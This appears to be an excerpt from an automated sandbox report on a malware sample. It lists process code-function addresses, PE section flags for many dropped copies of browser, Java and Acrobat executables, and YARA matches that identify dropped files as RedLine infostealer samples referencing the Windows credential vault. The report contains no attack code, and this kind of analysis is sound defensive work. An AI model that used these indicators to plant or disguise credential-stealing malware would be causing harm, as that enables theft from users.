Source: C:\Windows\System32\AppVClient.exe	Code function: 12_2_00B992A0	12_2_00B992A0
Source: C:\Windows\System32\AppVClient.exe	Code function: 12_2_00B993B0	12_2_00B993B0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_02DD41C8	13_2_02DD41C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_02DD4A98	13_2_02DD4A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_02DDEA80	13_2_02DDEA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_02DDAA43	13_2_02DDAA43
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_02DD3E80	13_2_02DD3E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_02DDDF00	13_2_02DDDF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_02DDDF00	13_2_02DDDF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_02DD1B41	13_2_02DD1B41
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06B056B8	13_2_06B056B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06B0C2A0	13_2_06B0C2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06B066E8	13_2_06B066E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06B07E78	13_2_06B07E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06B0B32A	13_2_06B0B32A
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06B03178	13_2_06B03178
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06B07798	13_2_06B07798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06B02350	13_2_06B02350
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06B0E4C0	13_2_06B0E4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06B00040	13_2_06B00040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06B05DDF	13_2_06B05DDF
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_06B00025	13_2_06B00025
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 14_2_02E5DC74	14_2_02E5DC74
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_0440B490	18_2_0440B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_0440B470	18_2_0440B470
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_0440B487	18_2_0440B487
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 18_2_0440306A	18_2_0440306A
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 22_2_013D326C	22_2_013D326C
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 22_2_064DDAAC	22_2_064DDAAC
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 22_2_064D1B94	22_2_064D1B94
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 22_2_064DE608	22_2_064DE608
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 22_2_064D25A8	22_2_064D25A8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 22_2_064D25B8	22_2_064D25B8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 22_2_064D4172	22_2_064D4172
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 22_2_064D1D20	22_2_064D1D20
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 22_2_06553419	22_2_06553419
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 28_2_009BA810	28_2_009BA810
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 28_2_00997C00	28_2_00997C00
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 28_2_009979F0	28_2_009979F0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 28_2_009C2D40	28_2_009C2D40
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 28_2_009BEEB0	28_2_009BEEB0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 28_2_009B92A0	28_2_009B92A0
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 28_2_009B93B0	28_2_009B93B0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 29_2_022C92A0	29_2_022C92A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 29_2_022CEEB0	29_2_022CEEB0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 29_2_022C93B0	29_2_022C93B0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 29_2_022A7C00	29_2_022A7C00
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 29_2_022CA810	29_2_022CA810
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 29_2_022D2D40	29_2_022D2D40
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 29_2_022A79F0	29_2_022A79F0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Load Driver

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Security

Source: C:\Users\user\Desktop\RJKUWSGxej.exe

Code function: String function: 00007FF6C74FC1A0 appears 63 times

Source: 117.0.5938.132_chrome_installer.exe.7.dr	Static PE information: Resource name: B7 type: 7-zip archive data, version 0.4
Source: 117.0.5938.132_chrome_installer.exe.7.dr	Static PE information: Resource name: BL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 1522998 bytes, 1 file, at 0x2c +A "setup.exe", number 1, 133 datablocks, 0x1203 compression
Source: Acrobat.exe.7.dr	Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
Source: SingleClientServicesUpdater.exe.7.dr	Static PE information: Resource name: 7Z type: 7-zip archive data, version 0.4

Source: identity_helper.exe.7.dr	Static PE information: Number of sections : 12 > 10
Source: elevation_service.exe.7.dr	Static PE information: Number of sections : 12 > 10
Source: ie_to_edge_stub.exe.7.dr	Static PE information: Number of sections : 11 > 10
Source: msedge_proxy.exe0.7.dr	Static PE information: Number of sections : 12 > 10
Source: notification_click_helper.exe.7.dr	Static PE information: Number of sections : 13 > 10
Source: setup.exe.7.dr	Static PE information: Number of sections : 13 > 10
Source: pwahelper.exe0.7.dr	Static PE information: Number of sections : 12 > 10
Source: msedge_proxy.exe.7.dr	Static PE information: Number of sections : 12 > 10
Source: msedgewebview2.exe.7.dr	Static PE information: Number of sections : 14 > 10
Source: msedge_pwa_launcher.exe.7.dr	Static PE information: Number of sections : 13 > 10
Source: pwahelper.exe.7.dr	Static PE information: Number of sections : 12 > 10
Source: elevation_service.exe0.7.dr	Static PE information: Number of sections : 12 > 10

Source: RJKUWSGxej.exe	Binary or memory string: OriginalFilename vs RJKUWSGxej.exe
Source: RJKUWSGxej.exe	Binary or memory string: OriginalFilenameGetInterfacesisDirectory.dllR vs RJKUWSGxej.exe

Source: unknown

Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys

Source: 5.2.jsc.exe.3879580.2.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 5.2.jsc.exe.3879580.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.jsc.exe.38b6790.1.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 13.0.neworigin.exe.ad0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 14.0.build.exe.c80000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 5.2.jsc.exe.38b6790.1.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 5.2.jsc.exe.3879580.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: DiagnosticsHub.StandardCollector.Service.exe.5.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.5.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.5.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.5.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: minidump-analyzer.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleCrashHandler64.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdate.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateBroker.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pingsender.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: plugin-container.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: private_browsing.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Au3Info_x64.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe0.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe0.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe0.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdate.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateBroker.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateComRegisterShell64.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateCore.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateOnDemand.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MicrosoftEdgeUpdateSetup.exe.7.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

